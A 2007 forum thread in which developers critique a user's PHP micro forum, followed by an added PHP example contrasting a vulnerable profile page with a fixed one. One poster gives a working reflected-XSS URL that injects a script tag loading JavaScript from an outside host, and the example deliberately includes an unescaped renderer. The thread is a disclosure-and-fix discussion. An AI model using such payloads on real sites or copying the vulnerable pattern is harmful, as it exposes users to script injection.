kristopherWindsor Posted February 22, 2007
You can test this forum, or even embed threads in your web pages. Details are here: http://fusionware.ourproject.org/itech/microforum/index.php
Link to comment https://forums.phpfreaks.com/topic/39572-my-micro-forum/
Lumio Posted February 22, 2007
If I click on register without typing a name... I get into it.
All-in-one: Not my flavor
gazever Posted February 22, 2007
Don't like the frames.
gazever Posted February 22, 2007
Lots of validation errors.
AXiSS Posted February 22, 2007
No code for inserting URLs and stuff? It sucks.
kristopherWindsor (Author) Posted February 22, 2007
> No code for inserting URLs and stuff? It sucks.
Yes there is. It is the same as on this forum. google.com
> Lots of validation errors.
I think they are features, not bugs. Of course I don't validate emails, but why would someone put a fake email when they don't have to?
> If I click on register without typing a name... I get into it.
That is a feature. It will name you with the first 7 digits of your IP Address.
> Not my flavor
Why???
Jessica Posted February 23, 2007
I love the old "It's not a bug, it's a feature" excuse. Nice.
JBS103 Posted February 23, 2007
I'm not sure I understand the entire concept behind this. The frames make the website pretty difficult to read, the green and white background is distracting, and your user method isn't working because when I log in with no name, it says I have about 3 more posts than I have ever made.
kristopherWindsor (Author) Posted February 23, 2007
If you embed a thread in your own web page, then it will use the style of that page instead of mine. Note, the threads themselves have no formatting: http://fusionware.ourproject.org/itech/microforum/viewthread.php?c=Micro%20Forum
The forum tracks people by the first seven digits of their IP Address. Maybe someone else has the same first seven digits?
AXiSS Posted February 24, 2007
> I love the old "It's not a bug, it's a feature" excuse. Nice.
Screwed up code always sets your website apart. It's a feature that makes yours different from all others.
roopurt18 Posted February 24, 2007
I think the original comment about validation errors was in response to the page itself not having valid markup, not the lack of validation by his forms. Personally, I don't care if you validate data or not, but you should at least sanitize it.
ted_chou12 Posted February 25, 2007
I believe this is more like a guestbook than a forum. Btw, how is the permanent cookie done?
kristopherWindsor (Author) Posted February 26, 2007
> I believe this is more like a guestbook than a forum. Btw, how is the permanent cookie done?
My program makes a folder on the server named after the first seven digits of your IP Address, so its existence tells the program you have already registered.
> I think the original comment about validation errors was in response to the page itself not having valid markup, not the lack of validation by his forms.
You mean the <br> vs. <br /> war?? <br> wins because the browser can process it just as fast. But what validation is missing??
> Screwed up code always sets your website apart.
Examples?
Lumio Posted February 26, 2007
> You mean the <br> vs. <br /> war?? <br> wins because the browser can process it just as fast. But what validation is missing??
You know W3C, right? So look at yourself: http://validator.w3.org/
I get 10 errors on the start page alone.
Also you don't use quotes. I mean... you write <img src=source> - Better: <img src="source" />
The slash is because it is a single tag.
alpine Posted February 26, 2007
> Better: <img src="source" /> The slash is because it is a single tag.
Just remember the difference between HTML and XHTML.
Lumio Posted February 26, 2007
Yes, that's true. But if you use a doctype (which you must put at the beginning of the page) like
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
you must add those slashes to single tags.
alpine Posted February 26, 2007
...if the doctype is XHTML, not HTML.
JoshF Posted February 26, 2007
I think you should change the colors.
kristopherWindsor (Author) Posted February 26, 2007
> I think you should change the colors.
The style is only part of the home page, not the threads themselves. No style here: http://fusionware.ourproject.org/itech/microforum/viewthread.php?c=Windsor_Blog
> Also you don't use quotes. I mean... you write <img src=source> - Better: <img src="source" />
I use quotes for sources defined by the users, but not for smilies.
> The slash is because it is a single tag.
It is pointless. Google does not use it, so go pick on them instead.
<a class=q href="http://blogsearch.google.com/?ie=UTF-8&oe=UTF-8&hl=en&tab=wb" onclick="return qs(this)">Blogs</a><br><a class=q href="http://books.google.com/bkshp?ie=UTF-8&oe=UTF-8&hl=en&tab=wp" onclick="return qs(this)">Books</a><br><a class=q href="http://froogle.google.com/frghp?ie=UTF-8&oe=UTF-8&hl=en&tab=wf" onclick="return qs(this)">Froogle</a><br><a class=q href="http://groups.google.com/grphp?ie=UTF-8&oe=UTF-8&hl=en&tab=wg" onclick="return qs(this)">Groups</a><br><a class=q href="http://www.google.com/ptshp?ie=UTF-8&oe=UTF-8&hl=en&tab=wt" onclick="return qs(this)">Patents</a><br>
> So look at yourself: http://validator.w3.org/
The validator isn't working right. It says I am missing the "ACTION", but it is there:
Line 1 column 160: required attribute "ACTION" not specified.
...ter.</div><br><form enctype=multipart/form-data action="newprofile.php?c=Wind
The attribute given above is required for an element that you've used, but you have omitted it. For instance, in most HTML and XHTML document types the "type" attribute is required on the "script" element and the "alt" attribute is required for the "img" element.
obsidian Posted February 26, 2007
You've got yourself wide open for someone who really wants to attack. Not only are we able to pull some information about structure from some of the PHP errors that are thrown, but in some of the pages, if you modify the URL just right, I can get my own javascript functions to run on your page (XSS vulnerabilities).
One other thing: I simply placed a single quote in for my username, and not only did it take it, but it picked up someone else's signature information and avatar... not too hot.
Lumio Posted February 26, 2007
> The validator isn't working right. It says I am missing the "ACTION", but it is there...
That's maybe because of some errors before the form tag. So if you fix the errors before it, maybe it works.
kristopherWindsor (Author) Posted February 27, 2007
> You've got yourself wide open for someone who really wants to attack. Not only are we able to pull some information about structure from some of the PHP errors that are thrown, but in some of the pages, if you modify the URL just right, I can get my own javascript functions to run on your page (XSS vulnerabilities). One other thing: I simply placed a single quote in for my username, and not only did it take it, but it picked up someone else's signature information and avatar... not too hot.
I think you are mistaken. The Username is loaded directly from a file, formatted, and displayed. It is not used for searching or logins. If your picture was a star, and your signature said "Have a nice day! ", that is because those are the defaults.
I don't think you can get JavaScript to run. Could you please show me without crashing my computer?
What PHP errors? Everyone says there are errors but won't show me!!! The page should either work fine or be blank.
obsidian Posted February 27, 2007
> I think you are mistaken. The Username is loaded directly from a file, formatted, and displayed. It is not used for searching or logins. If your picture was a star, and your signature said "Have a nice day! ", that is because those are the defaults.
Ok, you're right on that one. My bad. I'm just not used to forums selecting an avatar and signature for me.
> I don't think you can get JavaScript to run. Could you please show me without crashing my computer? What PHP errors? Everyone says there are errors but won't show me!!! The page should either work fine or be blank.
Keep in mind that we are here to help test your stuff, and we're not going to bring things to light without testing them first. When most of the users on here recommend enhancements due to security holes, you probably ought to check them out first instead of denying their existence.
http://fusionware.ourproject.org/itech/microforum/viewprofile.php?c=%3Cscript%20type=text/javascript%20src=http://phpfreaks.guahanweb.com/scripts/xss.js%3E%3C/script%3E
If you follow that link, you'll not only see the PHP errors to which people have been referring displayed, but you will also see how I've been able to hijack those errors to run my own Javascript. All I'm doing with it is posting a little alert box saying "I'm in!" and changing your background color and leaving you a message on the screen, but I could be running anything I wanted there. I'll continue to browse and see if I can come up with anything else that works to get in, too.
kristopherWindsor (Author) Posted February 28, 2007
Thanks for finding that. I think I have stopped it by using die(). I am doing some other slight changes, now.
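The weakness obsidian demonstrates above is a query-string value (the c parameter of viewprofile.php) being reflected into the page through an error message, and the fix discussed is a die() call. The PHP below is an added example, not the micro forum's own code: it shows a profile page that reflects the parameter unescaped next to a version that validates and escapes it, and notes why die() alone is not the fix. PROFILE_DIR and the two render_profile_* functions are assumed names.

```php
<?php
// Added example (not the micro forum's code): a viewprofile-style page that
// takes the profile name from ?c=..., as the forum's viewprofile.php does.
// PROFILE_DIR and the function names below are assumptions for illustration.

const PROFILE_DIR = __DIR__ . '/profiles';

// BEFORE: the user-supplied name is copied into an error message as-is, so a
// request such as ?c=<script src=...></script> lands in the HTML unchanged.
// Any PHP warning printed while handling $path leaks the path the same way.
function render_profile_vulnerable(string $name): string
{
    $path = PROFILE_DIR . '/' . $name;
    if (!is_file($path)) {
        return "Profile $name not found.";        // reflected XSS
    }
    return nl2br(file_get_contents($path));       // stored text also unescaped
}

// AFTER: allow-list the name, escape everything user-controlled before it is
// placed in HTML, and return a generic message when validation fails.
function render_profile_safe(string $name): string
{
    // Only letters, digits, underscore and space; this rejects '<', '>',
    // quotes and path separators before the value reaches the filesystem.
    if (!preg_match('/\A[A-Za-z0-9_ ]{1,32}\z/', $name)) {
        http_response_code(400);
        return 'Invalid profile name.';           // nothing reflected
    }
    $path = PROFILE_DIR . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return 'Profile ' . htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8') . ' not found.';
    }
    $body = file_get_contents($path);
    return nl2br(htmlspecialchars($body, ENT_QUOTES | ENT_HTML5, 'UTF-8'));
}

// die() stops later code from running, but it does not escape what was already
// echoed, and it does not silence PHP warnings. Keep display_errors off in
// production so warnings (and the attacker-controlled path inside them) never
// reach the browser; log them server-side instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
error_reporting(E_ALL);

header('Content-Type: text/html; charset=UTF-8');
echo render_profile_safe($_GET['c'] ?? '');
```

With display_errors off, the payload in obsidian's link produces only the 400 response, and a legitimate name that does not exist produces an escaped 404 message.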
darkcarnival Posted March 18, 2007
I agree it needs a lot more work. Validating is an absolute must. Remember users are by nature dumb and will do whatever they want. Just because you wouldn't do something doesn't mean someone else wouldn't. phpBB and Microsoft patch up code because they didn't think a user would exploit something that could be exploited.
The color is off-putting, but that's just personal opinion.